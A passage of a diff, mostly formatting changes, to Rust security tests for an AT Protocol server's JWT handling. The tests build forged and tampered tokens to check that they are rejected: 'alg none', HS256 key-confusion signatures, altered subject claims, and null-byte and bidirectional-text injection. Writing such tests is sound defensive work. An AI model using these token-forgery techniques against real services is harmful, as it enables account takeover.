}) 201 + )); 125 202 } 126 203 127 204 #[test]
+318 -84
tests/jwt_security.rs
··· 1 1 #![allow(unused_imports)] 2 2 mod common; 3 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 - use tranquil_pds::auth::{ 5 - self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, 6 - TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token, 7 - create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token, 8 - verify_access_token, verify_refresh_token, verify_token, 9 - }; 10 4 use chrono::{Duration, Utc}; 11 5 use common::{base_url, client, create_account_and_login, get_db_connection_string}; 12 6 use k256::SecretKey; ··· 15 9 use reqwest::StatusCode; 16 10 use serde_json::{Value, json}; 17 11 use sha2::{Digest, Sha256}; 12 + use tranquil_pds::auth::{ 13 + self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, 14 + TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token, 15 + create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token, 16 + verify_access_token, verify_refresh_token, verify_token, 17 + }; 18 18 19 19 fn generate_user_key() -> Vec<u8> { 20 20 let secret_key = SecretKey::random(&mut OsRng); ··· 48 48 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature); 49 49 let result = verify_access_token(&forged_token, &key_bytes); 50 50 assert!(result.is_err(), "Forged signature must be rejected"); 51 - assert!(result.err().unwrap().to_string().to_lowercase().contains("signature")); 51 + assert!( 52 + result 53 + .err() 54 + .unwrap() 55 + .to_string() 56 + .to_lowercase() 57 + .contains("signature") 58 + ); 52 59 53 60 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 54 61 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 55 62 payload["sub"] = json!("did:plc:attacker"); 56 63 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 57 64 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 58 - assert!(verify_access_token(&modified_token, &key_bytes).is_err(), "Modified payload must be rejected"); 65 + assert!( 66 + verify_access_token(&modified_token, &key_bytes).is_err(), 67 + "Modified payload must be rejected" 68 + ); 59 69 60 70 let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 61 71 let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]); 62 72 let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig); 63 - assert!(verify_access_token(&truncated_token, &key_bytes).is_err(), "Truncated signature must be rejected"); 73 + assert!( 74 + verify_access_token(&truncated_token, &key_bytes).is_err(), 75 + "Truncated signature must be rejected" 76 + ); 64 77 65 78 let mut extended_sig = sig_bytes.clone(); 66 79 extended_sig.extend_from_slice(&[0u8; 32]); 67 - let extended_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&extended_sig)); 68 - assert!(verify_access_token(&extended_token, &key_bytes).is_err(), "Extended signature must be rejected"); 80 + let extended_token = format!( 81 + "{}.{}.{}", 82 + parts[0], 83 + parts[1], 84 + URL_SAFE_NO_PAD.encode(&extended_sig) 85 + ); 86 + assert!( 87 + verify_access_token(&extended_token, &key_bytes).is_err(), 88 + "Extended signature must be rejected" 89 + ); 69 90 70 91 let key_bytes_user2 = generate_user_key(); 71 - assert!(verify_access_token(&token, &key_bytes_user2).is_err(), "Token signed with different key must be rejected"); 92 + assert!( 93 + verify_access_token(&token, &key_bytes_user2).is_err(), 94 + "Token signed with different key must be rejected" 95 + ); 72 96 } 73 97 74 98 #[test] ··· 83 107 "jti": "attack-token", "scope": SCOPE_ACCESS 84 108 }); 85 109 let none_token = create_unsigned_jwt(&none_header, &claims); 86 - assert!(verify_access_token(&none_token, &key_bytes).is_err(), "Algorithm 'none' must be rejected"); 110 + assert!( 111 + verify_access_token(&none_token, &key_bytes).is_err(), 112 + "Algorithm 'none' must be rejected" 113 + ); 87 114 88 115 let hs256_header = json!({ "alg": "HS256", "typ": TOKEN_TYPE_ACCESS }); 89 116 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&hs256_header).unwrap()); ··· 95 122 mac.update(message.as_bytes()); 96 123 let hmac_sig = mac.finalize().into_bytes(); 97 124 let hs256_token = format!("{}.{}", message, URL_SAFE_NO_PAD.encode(&hmac_sig)); 98 - assert!(verify_access_token(&hs256_token, &key_bytes).is_err(), "HS256 substitution must be rejected"); 125 + assert!( 126 + verify_access_token(&hs256_token, &key_bytes).is_err(), 127 + "HS256 substitution must be rejected" 128 + ); 99 129 100 130 for (alg, sig_len) in [("RS256", 256), ("ES256", 64)] { 101 131 let header = json!({ "alg": alg, "typ": TOKEN_TYPE_ACCESS }); 102 132 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 103 133 let fake_sig = URL_SAFE_NO_PAD.encode(&vec![1u8; sig_len]); 104 134 let token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 105 - assert!(verify_access_token(&token, &key_bytes).is_err(), "{} substitution must be rejected", alg); 135 + assert!( 136 + verify_access_token(&token, &key_bytes).is_err(), 137 + "{} substitution must be rejected", 138 + alg 139 + ); 106 140 } 107 141 } 108 142 ··· 114 148 let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token"); 115 149 let result = verify_access_token(&refresh_token, &key_bytes); 116 150 assert!(result.is_err(), "Refresh token as access must be rejected"); 117 - assert!(result.err().unwrap().to_string().contains("Invalid token type")); 151 + assert!( 152 + result 153 + .err() 154 + .unwrap() 155 + .to_string() 156 + .contains("Invalid token type") 157 + ); 118 158 119 159 let access_token = create_access_token(did, &key_bytes).expect("create access token"); 120 160 let result = verify_refresh_token(&access_token, &key_bytes); 121 161 assert!(result.is_err(), "Access token as refresh must be rejected"); 122 - assert!(result.err().unwrap().to_string().contains("Invalid token type")); 162 + assert!( 163 + result 164 + .err() 165 + .unwrap() 166 + .to_string() 167 + .contains("Invalid token type") 168 + ); 123 169 124 - let service_token = create_service_token(did, "did:web:target", "com.example.method", &key_bytes).unwrap(); 125 - assert!(verify_access_token(&service_token, &key_bytes).is_err(), "Service token as access must be rejected"); 170 + let service_token = 171 + create_service_token(did, "did:web:target", "com.example.method", &key_bytes).unwrap(); 172 + assert!( 173 + verify_access_token(&service_token, &key_bytes).is_err(), 174 + "Service token as access must be rejected" 175 + ); 126 176 } 127 177 128 178 #[test] ··· 136 186 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 137 187 "jti": "test", "scope": "admin.all" 138 188 }); 139 - let result = verify_access_token(&create_custom_jwt(&header, &invalid_scope, &key_bytes), &key_bytes); 140 - assert!(result.is_err() && result.err().unwrap().to_string().contains("Invalid token scope")); 189 + let result = verify_access_token( 190 + &create_custom_jwt(&header, &invalid_scope, &key_bytes), 191 + &key_bytes, 192 + ); 193 + assert!( 194 + result.is_err() 195 + && result 196 + .err() 197 + .unwrap() 198 + .to_string() 199 + .contains("Invalid token scope") 200 + ); 141 201 142 202 let empty_scope = json!({ 143 203 "iss": did, "sub": did, "aud": "did:web:test.pds", 144 204 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 145 205 "jti": "test", "scope": "" 146 206 }); 147 - assert!(verify_access_token(&create_custom_jwt(&header, &empty_scope, &key_bytes), &key_bytes).is_err()); 207 + assert!( 208 + verify_access_token( 209 + &create_custom_jwt(&header, &empty_scope, &key_bytes), 210 + &key_bytes 211 + ) 212 + .is_err() 213 + ); 148 214 149 215 let missing_scope = json!({ 150 216 "iss": did, "sub": did, "aud": "did:web:test.pds", 151 217 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 152 218 "jti": "test" 153 219 }); 154 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_scope, &key_bytes), &key_bytes).is_err()); 220 + assert!( 221 + verify_access_token( 222 + &create_custom_jwt(&header, &missing_scope, &key_bytes), 223 + &key_bytes 224 + ) 225 + .is_err() 226 + ); 155 227 156 228 for scope in [SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED] { 157 229 let claims = json!({ ··· 159 231 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 160 232 "jti": "test", "scope": scope 161 233 }); 162 - assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok()); 234 + assert!( 235 + verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes) 236 + .is_ok() 237 + ); 163 238 } 164 239 165 240 let refresh_scope = json!({ ··· 167 242 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 168 243 "jti": "test", "scope": SCOPE_REFRESH 169 244 }); 170 - assert!(verify_access_token(&create_custom_jwt(&header, &refresh_scope, &key_bytes), &key_bytes).is_err()); 245 + assert!( 246 + verify_access_token( 247 + &create_custom_jwt(&header, &refresh_scope, &key_bytes), 248 + &key_bytes 249 + ) 250 + .is_err() 251 + ); 171 252 } 172 253 173 254 #[test] ··· 181 262 "iss": did, "sub": did, "aud": "did:web:test.pds", 182 263 "iat": now - 7200, "exp": now - 3600, "jti": "test", "scope": SCOPE_ACCESS 183 264 }); 184 - let result = verify_access_token(&create_custom_jwt(&header, &expired, &key_bytes), &key_bytes); 265 + let result = verify_access_token( 266 + &create_custom_jwt(&header, &expired, &key_bytes), 267 + &key_bytes, 268 + ); 185 269 assert!(result.is_err() && result.err().unwrap().to_string().contains("expired")); 186 270 187 271 let future_iat = json!({ 188 272 "iss": did, "sub": did, "aud": "did:web:test.pds", 189 273 "iat": now + 60, "exp": now + 7200, "jti": "test", "scope": SCOPE_ACCESS 190 274 }); 191 - assert!(verify_access_token(&create_custom_jwt(&header, &future_iat, &key_bytes), &key_bytes).is_ok()); 275 + assert!( 276 + verify_access_token( 277 + &create_custom_jwt(&header, &future_iat, &key_bytes), 278 + &key_bytes 279 + ) 280 + .is_ok() 281 + ); 192 282 193 283 let just_expired = json!({ 194 284 "iss": did, "sub": did, "aud": "did:web:test.pds", 195 285 "iat": now - 10, "exp": now - 1, "jti": "test", "scope": SCOPE_ACCESS 196 286 }); 197 - assert!(verify_access_token(&create_custom_jwt(&header, &just_expired, &key_bytes), &key_bytes).is_err()); 287 + assert!( 288 + verify_access_token( 289 + &create_custom_jwt(&header, &just_expired, &key_bytes), 290 + &key_bytes 291 + ) 292 + .is_err() 293 + ); 198 294 199 295 let far_future = json!({ 200 296 "iss": did, "sub": did, "aud": "did:web:test.pds", 201 297 "iat": now, "exp": i64::MAX, "jti": "test", "scope": SCOPE_ACCESS 202 298 }); 203 - let _ = verify_access_token(&create_custom_jwt(&header, &far_future, &key_bytes), &key_bytes); 299 + let _ = verify_access_token( 300 + &create_custom_jwt(&header, &far_future, &key_bytes), 301 + &key_bytes, 302 + ); 204 303 205 304 let negative_iat = json!({ 206 305 "iss": did, "sub": did, "aud": "did:web:test.pds", 207 306 "iat": -1000000000i64, "exp": now + 3600, "jti": "test", "scope": SCOPE_ACCESS 208 307 }); 209 - let _ = verify_access_token(&create_custom_jwt(&header, &negative_iat, &key_bytes), &key_bytes); 308 + let _ = verify_access_token( 309 + &create_custom_jwt(&header, &negative_iat, &key_bytes), 310 + &key_bytes, 311 + ); 210 312 } 211 313 212 314 #[test] 213 315 fn test_malformed_tokens() { 214 316 let key_bytes = generate_user_key(); 215 317 216 - for token in ["", "not-a-token", "one.two", "one.two.three.four", "....", 217 - "eyJhbGciOiJFUzI1NksifQ", "eyJhbGciOiJFUzI1NksifQ.", "eyJhbGciOiJFUzI1NksifQ..", 218 - ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig"] { 219 - assert!(verify_access_token(token, &key_bytes).is_err(), "Malformed token must be rejected"); 318 + for token in [ 319 + "", 320 + "not-a-token", 321 + "one.two", 322 + "one.two.three.four", 323 + "....", 324 + "eyJhbGciOiJFUzI1NksifQ", 325 + "eyJhbGciOiJFUzI1NksifQ.", 326 + "eyJhbGciOiJFUzI1NksifQ..", 327 + ".eyJzdWIiOiJ0ZXN0In0.", 328 + "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig", 329 + ] { 330 + assert!( 331 + verify_access_token(token, &key_bytes).is_err(), 332 + "Malformed token must be rejected" 333 + ); 220 334 } 221 335 222 336 let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}"); 223 337 let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#); 224 338 let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 225 - assert!(verify_access_token(&format!("{}.{}.{}", invalid_header, claims_b64, fake_sig), &key_bytes).is_err()); 339 + assert!( 340 + verify_access_token( 341 + &format!("{}.{}.{}", invalid_header, claims_b64, fake_sig), 342 + &key_bytes 343 + ) 344 + .is_err() 345 + ); 226 346 227 347 let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#); 228 348 let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}"); 229 - assert!(verify_access_token(&format!("{}.{}.{}", header_b64, invalid_claims, fake_sig), &key_bytes).is_err()); 349 + assert!( 350 + verify_access_token( 351 + &format!("{}.{}.{}", header_b64, invalid_claims, fake_sig), 352 + &key_bytes 353 + ) 354 + .is_err() 355 + ); 230 356 } 231 357 232 358 #[test] ··· 239 365 "iss": did, "sub": did, "aud": "did:web:test", 240 366 "iat": Utc::now().timestamp(), "scope": SCOPE_ACCESS 241 367 }); 242 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_exp, &key_bytes), &key_bytes).is_err()); 368 + assert!( 369 + verify_access_token( 370 + &create_custom_jwt(&header, &missing_exp, &key_bytes), 371 + &key_bytes 372 + ) 373 + .is_err() 374 + ); 243 375 244 376 let missing_iat = json!({ 245 377 "iss": did, "sub": did, "aud": "did:web:test", 246 378 "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 247 379 }); 248 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_iat, &key_bytes), &key_bytes).is_err()); 380 + assert!( 381 + verify_access_token( 382 + &create_custom_jwt(&header, &missing_iat, &key_bytes), 383 + &key_bytes 384 + ) 385 + .is_err() 386 + ); 249 387 250 388 let missing_sub = json!({ 251 389 "iss": did, "aud": "did:web:test", 252 390 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 253 391 }); 254 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_sub, &key_bytes), &key_bytes).is_err()); 392 + assert!( 393 + verify_access_token( 394 + &create_custom_jwt(&header, &missing_sub, &key_bytes), 395 + &key_bytes 396 + ) 397 + .is_err() 398 + ); 255 399 256 400 let wrong_types = json!({ 257 401 "iss": 12345, "sub": ["did:plc:test"], "aud": {"url": "did:web:test"}, 258 402 "iat": "not a number", "exp": "also not a number", "jti": null, "scope": SCOPE_ACCESS 259 403 }); 260 - assert!(verify_access_token(&create_custom_jwt(&header, &wrong_types, &key_bytes), &key_bytes).is_err()); 404 + assert!( 405 + verify_access_token( 406 + &create_custom_jwt(&header, &wrong_types, &key_bytes), 407 + &key_bytes 408 + ) 409 + .is_err() 410 + ); 261 411 262 412 let unicode_injection = json!({ 263 413 "iss": "did:plc:test\u{0000}attacker", "sub": "did:plc:test\u{202E}rekatta", 264 414 "aud": "did:web:test.pds", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 265 415 "jti": "test", "scope": SCOPE_ACCESS 266 416 }); 267 - if let Ok(data) = verify_access_token(&create_custom_jwt(&header, &unicode_injection, &key_bytes), &key_bytes) { 417 + if let Ok(data) = verify_access_token( 418 + &create_custom_jwt(&header, &unicode_injection, &key_bytes), 419 + &key_bytes, 420 + ) { 268 421 assert!(!data.claims.sub.contains('\0')); 269 422 } 270 423 } ··· 308 461 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 309 462 "jti": "test", "scope": SCOPE_ACCESS 310 463 }); 311 - assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok()); 464 + assert!( 465 + verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok() 466 + ); 312 467 313 468 let valid_token = create_access_token(did, &key_bytes).expect("create token"); 314 469 let parts: Vec<&str> = valid_token.split('.').collect(); 315 470 let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 316 471 almost_valid[0] ^= 1; 317 - let almost_valid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&almost_valid)); 318 - let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&[0xFFu8; 64])); 472 + let almost_valid_token = format!( 473 + "{}.{}.{}", 474 + parts[0], 475 + parts[1], 476 + URL_SAFE_NO_PAD.encode(&almost_valid) 477 + ); 478 + let completely_invalid_token = format!( 479 + "{}.{}.{}", 480 + parts[0], 481 + parts[1], 482 + URL_SAFE_NO_PAD.encode(&[0xFFu8; 64]) 483 + ); 319 484 let _ = verify_access_token(&almost_valid_token, &key_bytes); 320 485 let _ = verify_access_token(&completely_invalid_token, &key_bytes); 321 486 } ··· 327 492 328 493 let key_bytes = generate_user_key(); 329 494 let forged_token = create_access_token("did:plc:fake-user", &key_bytes).unwrap(); 330 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 495 + let res = http_client 496 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 331 497 .header("Authorization", format!("Bearer {}", forged_token)) 332 - .send().await.unwrap(); 333 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged token must be rejected"); 498 + .send() 499 + .await 500 + .unwrap(); 501 + assert_eq!( 502 + res.status(), 503 + StatusCode::UNAUTHORIZED, 504 + "Forged token must be rejected" 505 + ); 334 506 335 507 let (access_jwt, _did) = create_account_and_login(&http_client).await; 336 508 let parts: Vec<&str> = access_jwt.split('.').collect(); ··· 338 510 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 339 511 340 512 payload["exp"] = json!(Utc::now().timestamp() - 3600); 341 - let expired_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), parts[2]); 342 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 513 + let expired_token = format!( 514 + "{}.{}.{}", 515 + parts[0], 516 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), 517 + parts[2] 518 + ); 519 + let res = http_client 520 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 343 521 .header("Authorization", format!("Bearer {}", expired_token)) 344 - .send().await.unwrap(); 522 + .send() 523 + .await 524 + .unwrap(); 345 525 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 346 526 347 527 let mut tampered_payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 348 528 tampered_payload["sub"] = json!("did:plc:attacker"); 349 529 tampered_payload["iss"] = json!("did:plc:attacker"); 350 - let tampered_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()), parts[2]); 351 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 530 + let tampered_token = format!( 531 + "{}.{}.{}", 532 + parts[0], 533 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()), 534 + parts[2] 535 + ); 536 + let res = http_client 537 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 352 538 .header("Authorization", format!("Bearer {}", tampered_token)) 353 - .send().await.unwrap(); 539 + .send() 540 + .await 541 + .unwrap(); 354 542 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 355 543 } 356 544 ··· 360 548 let http_client = client(); 361 549 let (access_jwt, _did) = create_account_and_login(&http_client).await; 362 550 363 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 551 + let res = http_client 552 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 364 553 .header("Authorization", format!("Bearer {}", access_jwt)) 365 - .send().await.unwrap(); 554 + .send() 555 + .await 556 + .unwrap(); 366 557 assert_eq!(res.status(), StatusCode::OK); 367 558 368 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 559 + let res = http_client 560 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 369 561 .header("Authorization", format!("bearer {}", access_jwt)) 370 - .send().await.unwrap(); 562 + .send() 563 + .await 564 + .unwrap(); 371 565 assert_eq!(res.status(), StatusCode::OK); 372 566 373 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 567 + let res = http_client 568 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 374 569 .header("Authorization", format!("Basic {}", access_jwt)) 375 - .send().await.unwrap(); 570 + .send() 571 + .await 572 + .unwrap(); 376 573 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 377 574 378 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 575 + let res = http_client 576 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 379 577 .header("Authorization", &access_jwt) 380 - .send().await.unwrap(); 578 + .send() 579 + .await 580 + .unwrap(); 381 581 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 382 582 383 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 583 + let res = http_client 584 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 384 585 .header("Authorization", "Bearer ") 385 - .send().await.unwrap(); 586 + .send() 587 + .await 588 + .unwrap(); 386 589 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 387 590 } 388 591 ··· 392 595 let http_client = client(); 393 596 let (access_jwt, _did) = create_account_and_login(&http_client).await; 394 597 395 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 598 + let res = http_client 599 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 396 600 .header("Authorization", format!("Bearer {}", access_jwt)) 397 - .send().await.unwrap(); 601 + .send() 602 + .await 603 + .unwrap(); 398 604 assert_eq!(res.status(), StatusCode::OK); 399 605 400 - let logout = http_client.post(format!("{}/xrpc/com.atproto.server.deleteSession", url)) 606 + let logout = http_client 607 + .post(format!("{}/xrpc/com.atproto.server.deleteSession", url)) 401 608 .header("Authorization", format!("Bearer {}", access_jwt)) 402 - .send().await.unwrap(); 609 + .send() 610 + .await 611 + .unwrap(); 403 612 assert_eq!(logout.status(), StatusCode::OK); 404 613 405 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 614 + let res = http_client 615 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 406 616 .header("Authorization", format!("Bearer {}", access_jwt)) 407 - .send().await.unwrap(); 617 + .send() 618 + .await 619 + .unwrap(); 408 620 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 409 621 } 410 622 ··· 414 626 let http_client = client(); 415 627 let (access_jwt, _did) = create_account_and_login(&http_client).await; 416 628 417 - let deact = http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 629 + let deact = http_client 630 + .post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 418 631 .header("Authorization", format!("Bearer {}", access_jwt)) 419 632 .json(&json!({})) 420 - .send().await.unwrap(); 633 + .send() 634 + .await 635 + .unwrap(); 421 636 assert_eq!(deact.status(), StatusCode::OK); 422 637 423 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 638 + let res = http_client 639 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 424 640 .header("Authorization", format!("Bearer {}", access_jwt)) 425 - .send().await.unwrap(); 641 + .send() 642 + .await 643 + .unwrap(); 426 644 assert_eq!(res.status(), StatusCode::OK); 427 645 let body: Value = res.json().await.unwrap(); 428 646 assert_eq!(body["active"], false); 429 647 430 - let post_res = http_client.post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 648 + let post_res = http_client 649 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 431 650 .header("Authorization", format!("Bearer {}", access_jwt)) 432 651 .json(&json!({ 433 652 "repo": _did, ··· 438 657 "createdAt": "2024-01-01T00:00:00Z" 439 658 } 440 659 })) 441 - .send().await.unwrap(); 660 + .send() 661 + .await 662 + .unwrap(); 442 663 assert_eq!(post_res.status(), StatusCode::UNAUTHORIZED); 443 664 let post_body: Value = post_res.json().await.unwrap(); 444 665 assert_eq!(post_body["error"], "AccountDeactivated"); ··· 452 673 let handle = format!("rt-replay-jwt-{}", ts); 453 674 let email = format!("rt-replay-jwt-{}@example.com", ts); 454 675 455 - let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 676 + let create_res = http_client 677 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 456 678 .json(&json!({ "handle": handle, "email": email, "password": "test-password-123" })) 457 - .send().await.unwrap(); 679 + .send() 680 + .await 681 + .unwrap(); 458 682 assert_eq!(create_res.status(), StatusCode::OK); 459 683 let account: Value = create_res.json().await.unwrap(); 460 684 let did = account["did"].as_str().unwrap(); ··· 462 686 let pool = sqlx::postgres::PgPoolOptions::new() 463 687 .max_connections(2) 464 688 .connect(&get_db_connection_string().await) 465 - .await.unwrap(); 689 + .await 690 + .unwrap(); 466 691 let code: String = sqlx::query_scalar!( 467 692 "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'", 468 693 did 469 694 ).fetch_one(&pool).await.unwrap(); 470 695 471 - let confirm = http_client.post(format!("{}/xrpc/com.atproto.server.confirmSignup", url)) 696 + let confirm = http_client 697 + .post(format!("{}/xrpc/com.atproto.server.confirmSignup", url)) 472 698 .json(&json!({ "did": did, "verificationCode": code })) 473 - .send().await.unwrap(); 699 + .send() 700 + .await 701 + .unwrap(); 474 702 assert_eq!(confirm.status(), StatusCode::OK); 475 703 let confirmed: Value = confirm.json().await.unwrap(); 476 704 let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string(); 477 705 478 - let first = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 706 + let first = http_client 707 + .post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 479 708 .header("Authorization", format!("Bearer {}", refresh_jwt)) 480 - .send().await.unwrap(); 709 + .send() 710 + .await 711 + .unwrap(); 481 712 assert_eq!(first.status(), StatusCode::OK); 482 713 483 - let replay = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 714 + let replay = http_client 715 + .post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 484 716 .header("Authorization", format!("Bearer {}", refresh_jwt)) 485 - .send().await.unwrap(); 717 + .send() 718 + .await 719 + .unwrap(); 486 720 assert_eq!(replay.status(), StatusCode::UNAUTHORIZED); 487 721 }
+413 -101
tests/lifecycle_record.rs
··· 26 26 } 27 27 }); 28 28 let create_res = client 29 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 29 + .post(format!( 30 + "{}/xrpc/com.atproto.repo.putRecord", 31 + base_url().await 32 + )) 30 33 .bearer_auth(&jwt) 31 34 .json(&create_payload) 32 35 .send() 33 36 .await 34 37 .expect("Failed to send create request"); 35 - assert_eq!(create_res.status(), StatusCode::OK, "Failed to create record"); 36 - let create_body: Value = create_res.json().await.expect("create response was not JSON"); 38 + assert_eq!( 39 + create_res.status(), 40 + StatusCode::OK, 41 + "Failed to create record" 42 + ); 43 + let create_body: Value = create_res 44 + .json() 45 + .await 46 + .expect("create response was not JSON"); 37 47 let uri = create_body["uri"].as_str().unwrap(); 38 48 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 39 - let params = [("repo", did.as_str()), ("collection", collection), ("rkey", &rkey)]; 49 + let params = [ 50 + ("repo", did.as_str()), 51 + ("collection", collection), 52 + ("rkey", &rkey), 53 + ]; 40 54 let get_res = client 41 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 55 + .get(format!( 56 + "{}/xrpc/com.atproto.repo.getRecord", 57 + base_url().await 58 + )) 42 59 .query(&params) 43 60 .send() 44 61 .await 45 62 .expect("Failed to send get request"); 46 - assert_eq!(get_res.status(), StatusCode::OK, "Failed to get record after create"); 63 + assert_eq!( 64 + get_res.status(), 65 + StatusCode::OK, 66 + "Failed to get record after create" 67 + ); 47 68 let get_body: Value = get_res.json().await.expect("get response was not JSON"); 48 69 assert_eq!(get_body["uri"], uri); 49 70 assert_eq!(get_body["value"]["text"], original_text); ··· 56 77 "swapRecord": initial_cid 57 78 }); 58 79 let update_res = client 59 - .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 80 + .post(format!( 81 + "{}/xrpc/com.atproto.repo.putRecord", 82 + base_url().await 83 + )) 60 84 .bearer_auth(&jwt) 61 85 .json(&update_payload) 62 86 .send() 63 87 .await 64 88 .expect("Failed to send update request"); 65 - assert_eq!(update_res.status(), StatusCode::OK, "Failed to update record"); 66 - let update_body: Value = update_res.json().await.expect("update response was not JSON"); 89 + assert_eq!( 90 + update_res.status(), 91 + StatusCode::OK, 92 + "Failed to update record" 93 + ); 94 + let update_body: Value = update_res 95 + .json() 96 + .await 97 + .expect("update response was not JSON"); 67 98 let updated_cid = update_body["cid"].as_str().unwrap().to_string(); 68 99 let get_updated_res = client 69 - .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 100 + .get(format!( 101 + "{}/xrpc/com.atproto.repo.getRecord", 102 + 